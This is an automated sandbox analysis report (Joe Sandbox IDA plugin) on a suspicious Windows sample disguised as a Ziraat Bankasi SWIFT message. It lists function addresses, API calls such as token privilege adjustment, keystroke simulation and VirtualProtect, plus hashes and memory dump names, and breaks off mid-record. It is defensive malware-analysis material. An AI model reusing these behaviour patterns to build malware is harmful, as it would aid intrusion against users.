Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: bbef7f58fe990f28d3338c0e76570c23c80a43de59de7c61edd78a3e3ea752cf
Instruction ID: 7b291e2ffce530af1229953d410b2cec165f5030bd4ee9b7742a459dace4fcf9
Opcode Fuzzy Hash: bbef7f58fe990f28d3338c0e76570c23c80a43de59de7c61edd78a3e3ea752cf
Instruction Fuzzy Hash: 1811A9725056909AD722BFE4D84139D7AA16F53331F1A4344E4345F1F3CBB49C4186A2

Function 0009F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 000A395C: __FF_MSGBANNER.LIBCMT ref: 000A3973
Part of subcall function 000A395C: __NMSG_WRITE.LIBCMT ref: 000A397A
Part of subcall function 000A395C: RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,0009F507,?,0000000E), ref: 000A399F

std::exception::exception.LIBCMT ref: 0009F51E
__CxxThrowException@8.LIBCMT ref: 0009F533

Part of subcall function 000A6805: RaiseException.KERNEL32(?,?,0000000E,00136A30,?,?,?,0009F538,0000000E,00136A30,?,00000001), ref: 000A6856

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 2b2258856f8489bbd65cda828ec6fa2548e201c107ff5f8dcdda13efb0adf166
Instruction ID: 9a9e2dbede099a573167f699652dfab7935202a5fb7172ab5298a13c5f9c6dc2
Opcode Fuzzy Hash: 2b2258856f8489bbd65cda828ec6fa2548e201c107ff5f8dcdda13efb0adf166
Instruction Fuzzy Hash: 59F0AF3110421EA7DB05BFDCE9019EE77ECAF01354F648125FA48E6182DFF19644A6A6

Function 000A35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

__lock_file.LIBCMT ref: 000A3629

Part of subcall function 000A4E1C: __lock.LIBCMT ref: 000A4E3F

__fclose_nolock.LIBCMT ref: 000A3634

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 42fa88f88efc46588de515c63279d6df9e083c3d4586dc689108a91ba71c67ad
Instruction ID: b72dfd8c347d944229b264819b40c291079215760c8972ba787484c7c53810dc
Opcode Fuzzy Hash: 42fa88f88efc46588de515c63279d6df9e083c3d4586dc689108a91ba71c67ad
Instruction Fuzzy Hash: EEF09031901604AAD721AFE588027AEBAE06F53330F29C208F424AB2C2CB788A419E55

Function 00E40AB0 Relevance: 1.7, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 00E40320: GetFileAttributesW.KERNELBASE(?), ref: 00E4032B

CreateDirectoryW.KERNELBASE(?,00000000), ref: 00E40C03

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 5724009b8e139447e09ab31a97541fce056115d539350b32bc65241ad9737dff
Instruction ID: ac6be959964095b9dffc5f096131bcbf7e24d78a09c1ab5797219990d8557794
Opcode Fuzzy Hash: 5724009b8e139447e09ab31a97541fce056115d539350b32bc65241ad9737dff
Instruction Fuzzy Hash: 3151A531A11208D7DF14EFA0D854BEFB379EF58300F109568AA09F7290EB799B45CB65

Function 000A2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 000A2A0B

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: 2c995f787f38fa14e512786b2520d42173e1a585f10c25489fac9dfc8255258b
Instruction ID: aecdb666244182427ced0dfcc08f8af6708c3108154cb1694f1c4d0832a8a0a3
Opcode Fuzzy Hash: 2c995f787f38fa14e512786b2520d42173e1a585f10c25489fac9dfc8255258b
Instruction Fuzzy Hash: B1418D31600706AFDB688FEDC8805AF7BE6AF56760F24863DE855C7241EA709D818B41

Function 0009ED15 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0009EDC7

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 98affbed7af324c9d6ee0f4f2a2251ddaea5954a9c3f026677167e3f7d8d9bee
Instruction ID: f38b01f070c7cdb0f9c53b4048a397e74a0afe48e4517a2c5d36c21182adfb72
Opcode Fuzzy Hash: 98affbed7af324c9d6ee0f4f2a2251ddaea5954a9c3f026677167e3f7d8d9bee
Instruction Fuzzy Hash: 1A31E470A01145DBDB58DF18C480A6DFBE6FF49340B6486A5E40ACB256DB31EDC1EB80

Function 000841A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00084214: FreeLibrary.KERNEL32(00000000,?), ref: 00084247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000839FE,?,00000001), ref: 000841DB

Part of subcall function 00084291: FreeLibrary.KERNEL32(00000000), ref: 000842C4

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 647716d1d92dc94049b58e9e8633b00d1132e69aefad31842fd5055c402b8950
Instruction ID: bfd29e42491787cec0af58bd4dd71f9f92c619a8bc75460b79118f4349021a3c
Opcode Fuzzy Hash: 647716d1d92dc94049b58e9e8633b00d1132e69aefad31842fd5055c402b8950
Instruction Fuzzy Hash: 8111A331604207ABDB20FB74DC06FEE77E9BF40700F508429F9D6A61C2EB749A059B60

Function 000AAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 000AAFC0

Part of subcall function 000A7BDA: __getptd_noexit.LIBCMT ref: 000A7BDA

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: ad111cd0e04cd976c0c4c3d86e855d1cad98ae5e45573e6167978809f22ab5ed
Instruction ID: f099114f0e6d3eb11d1a6fd57b24ec32d64fd82a46d3744c831cf6354c543a3e
Opcode Fuzzy Hash: ad111cd0e04cd976c0c4c3d86e855d1cad98ae5e45573e6167978809f22ab5ed
Instruction Fuzzy Hash: 32119D729056009FD7226FE4DC06B9E3AA0AF43331F1A8250E5381F1E3CBB589408BA1

Function 000839DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
Instruction ID: 2b028c14c250f5b688a075ce86c31f1d89e9aa9c5059bd3cf63bee65855742c3
Opcode Fuzzy Hash: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
Instruction Fuzzy Hash: 6401123150410EAECF45EFA4C8918FEBBB4AB11344F508129A55596196EA309A49DB60

Function 000A2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 000A2AED

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 2ba781a5b1d51c051c587b80507ae7956e89657b5c373f198857f16a93ed91e6
Instruction ID: d6a7f8d4d82b242f26bbcc264b342bd77b9ebcf14c0e541e90ded2ddf8d0aa2f
Opcode Fuzzy Hash: 2ba781a5b1d51c051c587b80507ae7956e89657b5c373f198857f16a93ed91e6
Instruction Fuzzy Hash: 88F06231500215EBDF21AFE88C067DF36A5BF52320F1A8525B8149A192D7798A52DB52

Function 00084252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,000839FE,?,00000001), ref: 00084286

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: bf346150f5a58f2140ea71e4858d9c24f7fbfac6021c7b0668badc7af7a8f7fc
Instruction ID: 8b3507c59122a7b62dfbd002b52df8db5c971ac9d5f07ffd7171eb803ca51651
Opcode Fuzzy Hash: bf346150f5a58f2140ea71e4858d9c24f7fbfac6021c7b0668badc7af7a8f7fc
Instruction Fuzzy Hash: DDF03971509702CFCB74AFA4E890816BBE4BF143253658A3EF1D682610C7729980DF50

Function 000840A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000840C6

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: cf40b43872b3a1d70086f219001ce15d807e37e29b36301ae728fce07567acb3
Instruction ID: 22ecd2beb470eac0e824047657304cffdf6895b1a2ce67de1408b2c998aed506
Opcode Fuzzy Hash: cf40b43872b3a1d70086f219001ce15d807e37e29b36301ae728fce07567acb3
Instruction Fuzzy Hash: CDE0C2366002245BC711A698DC46FFA77ADEF886A0F0A00B5F949E7245DEB4E9C18A90

Function 00E40320 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00E4032B

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 63a0a553f8a71605012890aedc5cf561d8157b03b47f06621bdfd7a6e2050c37
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 65E08C31A29208EBCB60CEA9A804AED7BA8D704320F104764EA0AEB280D6308E40A614

Function 00083AA3 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,?,00000000,00000002), ref: 00083AB3

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: e558db54257dfb3a4816ae95e53d4a55a5ea70157f9104509e374cc074ffbdf5
Instruction ID: 5d1a8af16f610e5c3686045214403be78e1a0570fa7edd8b03d3364cea08d96a
Opcode Fuzzy Hash: e558db54257dfb3a4816ae95e53d4a55a5ea70157f9104509e374cc074ffbdf5
Instruction Fuzzy Hash: 2DD05B36300105EBC700EF84FC45D69B7A4E795751F00445AF645475B3CB6198D5DB91

Function 00E402F0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00E402FB

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: b2ca918d5773da0d7ddfde8f22ad61577a5b2bc6c6f1fb616c5ce6cce5ec3341
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: A8D0A73090620CEBCB10CFB4AC089DE77A8D708320F104764FE15D7280D5319E409750

Function 00E41CFC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00E41D11

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: ce7adb861c154684d6004f3cd1adc288c3f361e5bb4028e41fb59844a6c65031
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: CAE0BF7494010DEFDB00EFB4D5496DE7BB4EF04302F1005A1FD05E7680DB309E548A62

Function 00E41D00 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00E41D11

Memory Dump Source

Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 651bef0f86dbf194d0f14518c4bd61fcc4c3de12cda1e75eb55d33ba9f36fbbf
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: C0E0E67494010DDFDB00EFB4D54969E7FB4EF04302F1001A1FD01E2280D6309D508A62

Non-executed Functions

Function 000EAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 000EB1CD

Strings

%d/%02d/%02d, xrefs: 000EAEFC

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: e4cb8a2133400c283ca6b68a3dff3b15ca1c430c11069c662991abe0af4fb997
Instruction ID: aabec196d00cf000734ce081becf73c41e90bc8ca00cc6126f0afe8b546fd0f2
Opcode Fuzzy Hash: e4cb8a2133400c283ca6b68a3dff3b15ca1c430c11069c662991abe0af4fb997
Instruction Fuzzy Hash: AE12BF71600248AFEB259F66DC49BAF7BF4FF49320F104169F916EA2D1DBB09941CB11

Function 0009EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0009EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000F3AEA
IsIconic.USER32(000000FF), ref: 000F3AF3
ShowWindow.USER32(000000FF,00000009), ref: 000F3B00
SetForegroundWindow.USER32(000000FF), ref: 000F3B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000F3B20
GetCurrentThreadId.KERNEL32 ref: 000F3B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 000F3B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 000F3B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 000F3B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 000F3B54
SetForegroundWindow.USER32(000000FF), ref: 000F3B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B6C
keybd_event.USER32(00000012,00000000), ref: 000F3B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B81
keybd_event.USER32(00000012,00000000), ref: 000F3B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B8F
keybd_event.USER32(00000012,00000000), ref: 000F3B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B9E
keybd_event.USER32(00000012,00000000), ref: 000F3BA3
SetForegroundWindow.USER32(000000FF), ref: 000F3BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 000F3BCD

Strings

Shell_TrayWnd, xrefs: 000F3AE5

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: ef4ad7a4a696d27e29f16d01efd1642c8ed84e32d748898c67b45a970d95dce9
Instruction ID: 729ef3bdf2d76bfb6d0abddcffcb7bdd345ef03299c0bf1e40544e0032c75875
Opcode Fuzzy Hash: ef4ad7a4a696d27e29f16d01efd1642c8ed84e32d748898c67b45a970d95dce9
Instruction Fuzzy Hash: F7316F71A4021CBFEB316BA59C4AF7F7E6CEB44B60F104015FB45EA5D0DAF19D40AAA0

Function 000BACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 000BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BB180
Part of subcall function 000BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BB1AD
Part of subcall function 000BB134: GetLastError.KERNEL32 ref: 000BB1BA

_memset.LIBCMT ref: 000BAD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 000BAD5A
CloseHandle.KERNEL32(?), ref: 000BAD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000BAD82
GetProcessWindowStation.USER32 ref: 000BAD9B
SetProcessWindowStation.USER32(00000000), ref: 000BADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000BADBF

Part of subcall function 000BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 000BAB99
Part of subcall function 000BAB84: CloseHandle.KERNEL32(?), ref: 000BABAB

Strings

, xrefs: 000BAD17
default, xrefs: 000BADBA
winsta0, xrefs: 000BAD7D

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
